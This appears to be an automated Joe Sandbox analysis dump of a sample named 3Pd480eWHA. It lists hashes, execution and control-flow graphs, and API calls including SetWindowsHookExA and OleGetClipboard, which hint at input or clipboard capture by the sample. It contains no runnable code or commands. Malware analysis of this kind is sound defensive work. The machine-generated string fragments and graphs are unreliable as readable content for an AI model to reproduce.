                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                              • Instruction ID: 7adaab352aa717b916c044831a99f4991ef712c09a2c9b56ba9fed1a583d178e
                                                                                              • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                              • Instruction Fuzzy Hash: 43F09636505518FFC7129FA5DC0099EBBB8EF16360B2540B9F801F7360D674EE019BA9

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.2%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:175
                                                                                              Total number of Limit Nodes:18
                                                                                              execution_graph 47965 38ea5e88 47966 38ea5eb4 GetCurrentProcess 47965->47966 47968 38ea5f19 47966->47968 47969 38ea5f20 GetCurrentThread 47966->47969 47968->47969 47970 38ea5f5d GetCurrentProcess 47969->47970 47971 38ea5f56 47969->47971 47972 38ea5f93 47970->47972 47971->47970 47973 38ea5fbb GetCurrentThreadId 47972->47973 47974 38ea5fec 47973->47974 48169 38ea2378 48170 38ea23e0 CreateWindowExW 48169->48170 48172 38ea249c 48170->48172 47975 38ea7260 47977 38ea7268 47975->47977 47978 38ea728b 47977->47978 47979 38ea5d14 47977->47979 47980 38ea72a0 KiUserCallbackDispatcher 47979->47980 47982 38ea730e 47980->47982 47982->47977 48173 38ea60d0 DuplicateHandle 48174 38ea6166 48173->48174 48175 38ea97f0 48177 38ea9824 SetWindowsHookExA 48175->48177 48178 38ea987a 48177->48178 47983 ad044 47984 ad05c 47983->47984 47985 ad0b6 47984->47985 47991 38ea6cdc 47984->47991 48002 38ea6cb1 47984->48002 48013 38ea2530 47984->48013 48017 38ea065c 47984->48017 48028 38ea6cbc 47984->48028 47992 38ea6ce0 47991->47992 47993 38ea6d41 47992->47993 47995 38ea6d31 47992->47995 47996 38ea6d3f 47993->47996 48072 38ea5cbc 47993->48072 48039 39001288 47995->48039 48044 39001279 47995->48044 48049 38ea6e68 47995->48049 48058 39001240 47995->48058 48063 38ea6e59 47995->48063 48003 38ea6cf4 48002->48003 48004 38ea6d41 48003->48004 48006 38ea6d31 48003->48006 48005 38ea5cbc 4 API calls 48004->48005 48007 38ea6d3f 48004->48007 48005->48007 48008 39001240 4 API calls 48006->48008 48009 38ea6e68 4 API calls 48006->48009 48010 38ea6e59 4 API calls 48006->48010 48011 39001288 4 API calls 48006->48011 48012 39001279 4 API calls 48006->48012 48008->48007 48009->48007 48010->48007 48011->48007 48012->48007 48014 38ea2556 48013->48014 48015 38ea065c 4 API calls 48014->48015 48016 38ea2577 48015->48016 48016->47985 48020 38ea0667 48017->48020 48018 38ea6d41 48019 38ea5cbc 4 API calls 48018->48019 48022 38ea6d3f 48018->48022 48019->48022 48020->48018 48021 38ea6d31 48020->48021 48023 39001240 4 API calls 48021->48023 48024 38ea6e68 4 API calls 48021->48024 48025 38ea6e59 4 API calls 48021->48025 48026 39001288 4 API calls 48021->48026 48027 39001279 4 API calls 48021->48027 48023->48022 48024->48022 48025->48022 48026->48022 48027->48022 48029 38ea6d14 48028->48029 48030 38ea6d41 48029->48030 48031 38ea6d31 48029->48031 48032 38ea5cbc 4 API calls 48030->48032 48033 38ea6d3f 48030->48033 48034 39001240 4 API calls 48031->48034 48035 38ea6e68 4 API calls 48031->48035 48036 38ea6e59 4 API calls 48031->48036 48037 39001288 4 API calls 48031->48037 48038 39001279 4 API calls 48031->48038 48032->48033 48034->48033 48035->48033 48036->48033 48037->48033 48038->48033 48041 3900129c 48039->48041 48040 39001328 48040->47996 48079 39001340 48041->48079 48082 3900132f 48041->48082 48046 3900129c 48044->48046 48045 39001328 48045->47996 48047 39001340 4 API calls 48046->48047 48048 3900132f 4 API calls 48046->48048 48047->48045 48048->48045 48051 38ea6e76 48049->48051 48050 38ea5cbc 4 API calls 48050->48051 48051->48050 48052 38ea6f4e 48051->48052 48097 38ea7339 48051->48097 48101 38ea7335 48051->48101 48105 38ea7331 48051->48105 48109 38ea7340 48051->48109 48113 38ea733c 48051->48113 48052->47996 48059 39001284 48058->48059 48061 39001340 4 API calls 48059->48061 48062 3900132f 4 API calls 48059->48062 48060 39001328 48060->47996 48061->48060 48062->48060 48064 38ea6e68 48063->48064 48065 38ea5cbc 4 API calls 48064->48065 48066 38ea6f4e 48064->48066 48067 38ea7339 2 API calls 48064->48067 48068 38ea733c 2 API calls 48064->48068 48069 38ea7340 2 API calls 48064->48069 48070 38ea7331 2 API calls 48064->48070 48071 38ea7335 2 API calls 48064->48071 48065->48064 48066->47996 48067->48064 48068->48064 48069->48064 48070->48064 48071->48064 48073 38ea5cc7 48072->48073 48074 38ea6faa 48073->48074 48075 38ea7054 48073->48075 48076 38ea7002 CallWindowProcW 48074->48076 48078 38ea6fb1 48074->48078 48077 38ea065c 3 API calls 48075->48077 48076->48078 48077->48078 48078->47996 48080 39001351 48079->48080 48085 390024d1 48079->48085 48080->48040 48083 39001351 48082->48083 48084 390024d1 4 API calls 48082->48084 48083->48040 48084->48083 48086 3900250c 48085->48086 48089 38ea5cbc 4 API calls 48086->48089 48090 38ea6f59 48086->48090 48087 3900251a 48087->48080 48089->48087 48091 38ea6f68 48090->48091 48092 38ea6faa 48091->48092 48093 38ea7054 48091->48093 48094 38ea7002 CallWindowProcW 48092->48094 48096 38ea6fb1 48092->48096 48095 38ea065c 3 API calls 48093->48095 48094->48096 48095->48096 48096->48087 48098 38ea735f 48097->48098 48099 38ea7458 48098->48099 48117 38ea78e7 48098->48117 48099->48051 48102 38ea735f 48101->48102 48103 38ea7458 48102->48103 48104 38ea78e7 2 API calls 48102->48104 48103->48051 48104->48102 48106 38ea735f 48105->48106 48107 38ea7458 48106->48107 48108 38ea78e7 2 API calls 48106->48108 48107->48051 48108->48106 48110 38ea735f 48109->48110 48111 38ea7458 48110->48111 48112 38ea78e7 2 API calls 48110->48112 48111->48051 48112->48110 48114 38ea735f 48113->48114 48115 38ea7458 48114->48115 48116 38ea78e7 2 API calls 48114->48116 48115->48051 48116->48114 48119 38ea7900 48117->48119 48118 38ea7914 48118->48098 48119->48118 48123 38ea7940 48119->48123 48128 38ea7931 48119->48128 48120 38ea7929 48120->48098 48124 38ea7952 48123->48124 48126 38ea79b1 48124->48126 48133 38ea7a03 48124->48133 48125 38ea7973 48125->48120 48126->48120 48129 38ea7952 48128->48129 48131 38ea79b1 48129->48131 48132 38ea7a03 2 API calls 48129->48132 48130 38ea7973 48130->48120 48131->48120 48132->48130 48134 38ea7a18 48133->48134 48141 38ea7af0 48134->48141 48145 38ea7ae1 48134->48145 48135 38ea7a2d 48136 38ea7a31 48135->48136 48149 38ea7bfa 48135->48149 48153 38ea7c08 48135->48153 48136->48125 48142 38ea7af8 48141->48142 48157 38ea75b8 48142->48157 48146 38ea7af8 48145->48146 48147 38ea75b8 OleInitialize 48146->48147 48148 38ea7b01 48147->48148 48148->48135 48151 38ea7c1d 48149->48151 48152 38ea7c43 48151->48152 48165 38ea76d0 48151->48165 48152->48136 48155 38ea7c1d 48153->48155 48154 38ea76d0 OleGetClipboard 48154->48155 48155->48154 48156 38ea7c43 48155->48156 48156->48136 48158 38ea75c3 48157->48158 48159 38ea7b01 48158->48159 48161 38ea5e6c 48158->48161 48159->48135 48162 38ea7b68 OleInitialize 48161->48162 48164 38ea7bcc 48162->48164 48164->48159 48166 38ea7cb0 OleGetClipboard 48165->48166 48168 38ea7d4a 48166->48168

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 127 389c3108-389c3129 128 389c312b-389c312e 127->128 129 389c38cf-389c38d2 128->129 130 389c3134-389c3153 128->130 131 389c38f8-389c38fa 129->131 132 389c38d4-389c38f3 129->132 139 389c316c-389c3176 130->139 140 389c3155-389c3158 130->140 133 389c38fc 131->133 134 389c3901-389c3904 131->134 132->131 133->134 134->128 136 389c390a-389c3913 134->136 145 389c317c-389c318b 139->145 140->139 142 389c315a-389c316a 140->142 142->145 253 389c318d call 389c3928 145->253 254 389c318d call 389c3921 145->254 146 389c3192-389c3197 147 389c3199-389c319f 146->147 148 389c31a4-389c3481 146->148 147->136 169 389c3487-389c3536 148->169 170 389c38c1-389c38ce 148->170 179 389c355f 169->179 180 389c3538-389c355d 169->180 182 389c3568-389c357b 179->182 180->182 184 389c38a8-389c38b4 182->184 185 389c3581-389c35a3 182->185 184->169 186 389c38ba 184->186 185->184 188 389c35a9-389c35b3 185->188 186->170 188->184 189 389c35b9-389c35c4 188->189 189->184 190 389c35ca-389c36a0 189->190 202 389c36ae-389c36de 190->202 203 389c36a2-389c36a4 190->203 207 389c36ec-389c36f8 202->207 208 389c36e0-389c36e2 202->208 203->202 209 389c3758-389c375c 207->209 210 389c36fa-389c36fe 207->210 208->207 211 389c3899-389c38a2 209->211 212 389c3762-389c379e 209->212 210->209 213 389c3700-389c372a 210->213 211->184 211->190 224 389c37ac-389c37ba 212->224 225 389c37a0-389c37a2 212->225 220 389c372c-389c372e 213->220 221 389c3738-389c3755 213->221 220->221 221->209 227 389c37bc-389c37c7 224->227 228 389c37d1-389c37dc 224->228 225->224 227->228 231 389c37c9 227->231 232 389c37de-389c37e4 228->232 233 389c37f4-389c3805 228->233 231->228 234 389c37e8-389c37ea 232->234 235 389c37e6 232->235 237 389c381d-389c3829 233->237 238 389c3807-389c380d 233->238 234->233 235->233 242 389c382b-389c3831 237->242 243 389c3841-389c3892 237->243 239 389c380f 238->239 240 389c3811-389c3813 238->240 239->237 240->237 244 389c3835-389c3837 242->244 245 389c3833 242->245 243->211 244->243 245->243 253->146 254->146
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,F]5$$q$$q$$q$$q$$q$$q$F]5
                                                                                              • API String ID: 0-866115568
                                                                                              • Opcode ID: 8502de6abd36e25c5d76e9e0b78b41446491e8498fe4fee948eba0730edf8784
                                                                                              • Instruction ID: 089c6c727c376a2589276cf10e70986060fda999799bf3417d7ec9dee721133f
                                                                                              • Opcode Fuzzy Hash: 8502de6abd36e25c5d76e9e0b78b41446491e8498fe4fee948eba0730edf8784
                                                                                              • Instruction Fuzzy Hash: 41321C35E10719CBDB14DB79C89069DF7B2FFC9300F6096A9E509AB214EB31A985CB81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,D]5$,D]5$F]5
                                                                                              • API String ID: 0-1418203747
                                                                                              • Opcode ID: a7788a33c7828f75e537cde63f8b0771a00fdcf6efaeba1165caa5340345be72
                                                                                              • Instruction ID: 81f091f42b908b190cfe8cf9a6c400fa97005eddd92cf1d2e1a89a2e7b19ad11
                                                                                              • Opcode Fuzzy Hash: a7788a33c7828f75e537cde63f8b0771a00fdcf6efaeba1165caa5340345be72
                                                                                              • Instruction Fuzzy Hash: 1B922738A00204CFEB54DFA8C584B59BBF2EB89358F5584A9D409AF361DB36ED81CF51

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1491 389c7e20-389c7e3e 1492 389c7e40-389c7e43 1491->1492 1493 389c7e45-389c7e61 1492->1493 1494 389c7e66-389c7e69 1492->1494 1493->1494 1495 389c7e8a-389c7e8d 1494->1495 1496 389c7e6b-389c7e85 1494->1496 1497 389c7e8f-389c7e9d 1495->1497 1498 389c7ea4-389c7ea7 1495->1498 1496->1495 1507 389c7ec6-389c7edc 1497->1507 1509 389c7e9f 1497->1509 1501 389c7ea9-389c7eb3 1498->1501 1502 389c7eb4-389c7eb6 1498->1502 1503 389c7ebd-389c7ec0 1502->1503 1504 389c7eb8 1502->1504 1503->1492 1503->1507 1504->1503 1511 389c80f7-389c8101 1507->1511 1512 389c7ee2-389c7eeb 1507->1512 1509->1498 1513 389c7ef1-389c7f0e 1512->1513 1514 389c8102-389c8137 1512->1514 1523 389c80e4-389c80f1 1513->1523 1524 389c7f14-389c7f3c 1513->1524 1517 389c8139-389c813c 1514->1517 1519 389c81ef-389c81f2 1517->1519 1520 389c8142-389c814e 1517->1520 1521 389c841e-389c8421 1519->1521 1522 389c81f8-389c8207 1519->1522 1525 389c8159-389c815b 1520->1525 1526 389c8444-389c8446 1521->1526 1527 389c8423-389c843f 1521->1527 1539 389c8209-389c8224 1522->1539 1540 389c8226-389c8261 1522->1540 1523->1511 1523->1512 1524->1523 1544 389c7f42-389c7f4b 1524->1544 1528 389c815d-389c8163 1525->1528 1529 389c8173-389c817a 1525->1529 1531 389c844d-389c8450 1526->1531 1532 389c8448 1526->1532 1527->1526 1534 389c8165 1528->1534 1535 389c8167-389c8169 1528->1535 1536 389c817c-389c8189 1529->1536 1537 389c818b 1529->1537 1531->1517 1541 389c8456-389c845f 1531->1541 1532->1531 1534->1529 1535->1529 1542 389c8190-389c8192 1536->1542 1537->1542 1539->1540 1550 389c8267-389c8278 1540->1550 1551 389c83f2-389c8407 1540->1551 1545 389c81a9-389c81e2 1542->1545 1546 389c8194-389c8197 1542->1546 1544->1514 1552 389c7f51-389c7f6d 1544->1552 1545->1522 1570 389c81e4-389c81ee 1545->1570 1546->1541 1558 389c83dd-389c83ec 1550->1558 1559 389c827e-389c829b 1550->1559 1551->1521 1560 389c80d2-389c80de 1552->1560 1561 389c7f73-389c7f9d 1552->1561 1558->1550 1558->1551 1559->1558 1571 389c82a1-389c8397 call 389c6648 1559->1571 1560->1523 1560->1544 1574 389c80c8-389c80cd 1561->1574 1575 389c7fa3-389c7fcb 1561->1575 1623 389c8399-389c83a3 1571->1623 1624 389c83a5 1571->1624 1574->1560 1575->1574 1581 389c7fd1-389c7fff 1575->1581 1581->1574 1587 389c8005-389c800e 1581->1587 1587->1574 1588 389c8014-389c8046 1587->1588 1596 389c8048-389c804c 1588->1596 1597 389c8051-389c806d 1588->1597 1596->1574 1599 389c804e 1596->1599 1597->1560 1598 389c806f-389c80c6 call 389c6648 1597->1598 1598->1560 1599->1597 1625 389c83aa-389c83ac 1623->1625 1624->1625 1625->1558 1626 389c83ae-389c83b3 1625->1626 1627 389c83b5-389c83bf 1626->1627 1628 389c83c1 1626->1628 1629 389c83c6-389c83c8 1627->1629 1628->1629 1629->1558 1630 389c83ca-389c83d6 1629->1630 1630->1558
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DR]5$$q$$q
                                                                                              • API String ID: 0-679301987
                                                                                              • Opcode ID: af85c49773b454ad93c6350124a3ceac5121e913d9ce90c4cd9c871f4cb3377b
                                                                                              • Instruction ID: 0425f31d08b023d820c7608613741bee29abb64b423df1a8cda3651b605f1a1f
                                                                                              • Opcode Fuzzy Hash: af85c49773b454ad93c6350124a3ceac5121e913d9ce90c4cd9c871f4cb3377b
                                                                                              • Instruction Fuzzy Hash: A4028B35B002149FEB14DB68D850B9EBBF2FF88354F1085A9D505AB395DB32ED42CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e392f4a33778a4348112f3312412e9b5cdce22041ccd2532b7fecb2d40b26e18
                                                                                              • Instruction ID: 957b64358c3a3a7190ace3db7699934256cc3d45ed46d99afac99428e7dba5da
                                                                                              • Opcode Fuzzy Hash: e392f4a33778a4348112f3312412e9b5cdce22041ccd2532b7fecb2d40b26e18
                                                                                              • Instruction Fuzzy Hash: 9A63F931D10B1A8ADB15EF68C8806A9F7B1FF99300F55D79AE45877121EB70AAC4CF81

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2455 11e289-11e2aa 2456 11e2ac-11e2e2 2455->2456 2457 11e30e-11e315 2455->2457 2463 11e2e9-11e2eb 2456->2463 2464 11e316-11e37d 2463->2464 2465 11e2ed-11e306 2463->2465 2475 11e386-11e396 2464->2475 2476 11e37f-11e381 2464->2476 2465->2457 2478 11e398 2475->2478 2479 11e39d-11e3ad 2475->2479 2477 11e625-11e62c 2476->2477 2478->2477 2481 11e3b3-11e3c1 2479->2481 2482 11e60c-11e61a 2479->2482 2485 11e3c7 2481->2485 2486 11e62d-11e6a6 2481->2486 2482->2486 2487 11e61c-11e620 call 117b18 2482->2487 2485->2486 2488 11e591-11e5bd 2485->2488 2489 11e432-11e453 2485->2489 2490 11e4f7-11e51f 2485->2490 2491 11e458-11e479 2485->2491 2492 11e5dc-11e5fe 2485->2492 2493 11e5bf-11e5da call 110350 2485->2493 2494 11e47e-11e49f 2485->2494 2495 11e600-11e60a 2485->2495 2496 11e3e5-11e406 2485->2496 2497 11e4a4-11e4c5 2485->2497 2498 11e524-11e561 2485->2498 2499 11e566-11e58c 2485->2499 2500 11e40b-11e42d 2485->2500 2501 11e4ca-11e4f2 2485->2501 2502 11e3ce-11e3e0 2485->2502 2487->2477 2488->2477 2489->2477 2490->2477 2491->2477 2492->2477 2493->2477 2494->2477 2495->2477 2496->2477 2497->2477 2498->2477 2499->2477 2500->2477 2501->2477 2502->2477
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Xq$$q
                                                                                              • API String ID: 0-855381642
                                                                                              • Opcode ID: 94c443db07a3f3f6530c8bf6ce09645044f51d6b0e690910263f4e611b89f2d7
                                                                                              • Instruction ID: 4083dd64cba0d287d703239915dac003a7c6543d14684680bdfba5864b7ebf65
                                                                                              • Opcode Fuzzy Hash: 94c443db07a3f3f6530c8bf6ce09645044f51d6b0e690910263f4e611b89f2d7
                                                                                              • Instruction Fuzzy Hash: 96B17030F042158BDB1CABB998546BE7BB7BBC8300F55856EE407E7294DE389C429792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,D]5
                                                                                              • API String ID: 0-3851750844
                                                                                              • Opcode ID: 633cdf399227b343a3da943aa1b1254175ccb4c2954f313d882dd0fea77fee6a
                                                                                              • Instruction ID: 945977132b66cce61cc7a8baedbc553d25c071e7efeeec370a123a4128b677fa
                                                                                              • Opcode Fuzzy Hash: 633cdf399227b343a3da943aa1b1254175ccb4c2954f313d882dd0fea77fee6a
                                                                                              • Instruction Fuzzy Hash: E4629E38A00204DFEB15DB68C954B9DBBF6EF88354F548469E406EB355DB36EC42CB82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \Vzm
                                                                                              • API String ID: 0-779989405
                                                                                              • Opcode ID: 12fcc2d6a0c8023ab67adacbe69723f3d8a6e8b21fe632c488b8420f2fa4f5bc
                                                                                              • Instruction ID: 0fc3800abec18db3c3ea1c19733d928e8c48cb5e800fb838941cb0ab3e452d3b
                                                                                              • Opcode Fuzzy Hash: 12fcc2d6a0c8023ab67adacbe69723f3d8a6e8b21fe632c488b8420f2fa4f5bc
                                                                                              • Instruction Fuzzy Hash: E8917E70E003099FDF28CFA9D9857DEBBF2AF48714F148139E414A7294DB749986CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b258fbcdfb6864e9023a49409e0e56e4b97a431d07d6acdeceafd784fe7cc271
                                                                                              • Instruction ID: d384d6eb126bba7639f4bf439bce134a09086fbe874fbbfd2d979768abce6fcf
                                                                                              • Opcode Fuzzy Hash: b258fbcdfb6864e9023a49409e0e56e4b97a431d07d6acdeceafd784fe7cc271
                                                                                              • Instruction Fuzzy Hash: 6032A235B00204DFEB15CB68D990B9EBBB6FB88718F508525E505EB391DB35EC42CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 31b599946b193c9a789b8faa1de8acbda13e1cf9f632b11c363d5af0299428cd
                                                                                              • Instruction ID: 3d13fe8e0a98d23bcb234a43fb763d7e1bf08c43030133ea928b7a85e0c5719c
                                                                                              • Opcode Fuzzy Hash: 31b599946b193c9a789b8faa1de8acbda13e1cf9f632b11c363d5af0299428cd
                                                                                              • Instruction Fuzzy Hash: B222C139E00214CFEB14DBA4C48079EBBB6FF89364F24856AD445AB355DB36DC42CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6916d1d5ea668a61dcb4d89b7c431d46859901c7e4bdcb51b9d4dbf6ab7d20d2
                                                                                              • Instruction ID: 31dd75fd31c938820702f6f8bf14781eeb220f188b980a2cacaca4aa8f17daef
                                                                                              • Opcode Fuzzy Hash: 6916d1d5ea668a61dcb4d89b7c431d46859901c7e4bdcb51b9d4dbf6ab7d20d2
                                                                                              • Instruction Fuzzy Hash: DD227178E40209CFFB10CBA8C49079EB7F6FB49354F608426E445EB391DA36DC819B92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ee4bfc6d4a3249ab53c7e4bbd52322d48538ff1ec194e871cdbffe3aa611d80
                                                                                              • Instruction ID: d80c0bf720f75d662caf03849292f375fa692e9017989fc715cfc209ac8af45c
                                                                                              • Opcode Fuzzy Hash: 4ee4bfc6d4a3249ab53c7e4bbd52322d48538ff1ec194e871cdbffe3aa611d80
                                                                                              • Instruction Fuzzy Hash: 8CD18071A012048FDB14CF68D8807ADBBB2EF88310F54857AD909DB395DB35DD85CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2494911777.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_110000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a02993e0ba428e7cc48194c55528298edfec5d65b6820990b56dc3e000b33d14
                                                                                              • Instruction ID: bb71bf149fe82b77bd295f8c399dc4949b5a35eaab92a03610ee6cb923d2a5ca
                                                                                              • Opcode Fuzzy Hash: a02993e0ba428e7cc48194c55528298edfec5d65b6820990b56dc3e000b33d14
                                                                                              • Instruction Fuzzy Hash: 9DB13F70E042098FDF28CFA9D8917EDBBF2AF48714F148539D815E7294EB749885CB85

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 389cad60-389cad7e 1 389cad80-389cad83 0->1 2 389cad8d-389cad90 1->2 3 389cad85-389cad8a 1->3 4 389cadaa-389cadad 2->4 5 389cad92-389cad9b 2->5 3->2 8 389cadbe-389cadc1 4->8 9 389cadaf-389cadb3 4->9 6 389caf97-389cafa5 5->6 7 389cada1-389cada5 5->7 19 389caf3b 6->19 20 389cafa7-389cafce 6->20 7->4 12 389cadd1-389cadd4 8->12 13 389cadc3-389cadcc 8->13 10 389caf8c-389caf96 9->10 11 389cadb9 9->11 11->8 14 389cadd6-389cadf2 12->14 15 389cadf7-389cadfa 12->15 13->12 14->15 17 389cadfc-389cae0f 15->17 18 389cae14-389cae17 15->18 17->18 23 389caf7d-389caf86 18->23 24 389cae1d-389cae20 18->24 25 389caf42-389caf73 19->25 22 389cafd0-389cafd3 20->22 26 389cafd5 call 389cb2ba 22->26 27 389cafe2-389cafe5 22->27 23->5 23->10 29 389cae34-389cae36 24->29 30 389cae22-389cae2f 24->30 59 389caf7a 25->59 37 389cafdb-389cafdd 26->37 33 389cafe7-389cafeb 27->33 34 389caff2-389caff5 27->34 35 389cae3d-389cae40 29->35 36 389cae38 29->36 30->29 38 389cafed 33->38 39 389cb00b-389cb046 33->39 40 389caff7-389cb001 34->40 41 389cb002-389cb005 34->41 35->1 43 389cae46-389cae6a 35->43 36->35 37->27 38->34 53 389cb04c-389cb058 39->53 54 389cb239-389cb24c 39->54 41->39 45 389cb26e-389cb271 41->45 43->59 60 389cae70-389cae7f 43->60 46 389cb294-389cb296 45->46 47 389cb273-389cb28f 45->47 50 389cb29d-389cb2a0 46->50 51 389cb298 46->51 47->46 50->22 57 389cb2a6-389cb2b0 50->57 51->50 65 389cb078-389cb0bc 53->65 66 389cb05a-389cb073 53->66 58 389cb24e 54->58 64 389cb24f 58->64 59->23 70 389cae97-389caed2 call 389c6648 60->70 71 389cae81-389cae87 60->71 64->64 83 389cb0be-389cb0d0 65->83 84 389cb0d8-389cb117 65->84 66->58 86 389caeea-389caf01 70->86 87 389caed4-389caeda 70->87 72 389cae89 71->72 73 389cae8b-389cae8d 71->73 72->70 73->70 83->84 92 389cb11d-389cb1f8 call 389c6648 84->92 93 389cb1fe-389cb213 84->93 101 389caf19-389caf2a 86->101 102 389caf03-389caf09 86->102 90 389caedc 87->90 91 389caede-389caee0 87->91 90->86 91->86 92->93 93->54 101->25 107 389caf2c-389caf32 101->107 103 389caf0d-389caf0f 102->103 104 389caf0b 102->104 103->101 104->101 108 389caf34 107->108 109 389caf36-389caf38 107->109 108->25 109->19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DR]5$XM$XM$$q$$q$$q$$q$$q$$q$$q$$q
                                                                                              • API String ID: 0-2264155270
                                                                                              • Opcode ID: 29694e13868523483e03afd011f5d100a15ff869ca746d2207add7b0043327da
                                                                                              • Instruction ID: 83337b5e5f3caed28faf3c59525b9e59e31efac8682f8f11e3ad3a584f528315
                                                                                              • Opcode Fuzzy Hash: 29694e13868523483e03afd011f5d100a15ff869ca746d2207add7b0043327da
                                                                                              • Instruction Fuzzy Hash: 5FE17C74E003098FEB15DFA8D49069EB7F6BB88315F608529E405EB355DB32EC46CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2524428660.00000000389C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_389c0000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (\]5$(\]5$$q$$q$$q$$q$$q$$q
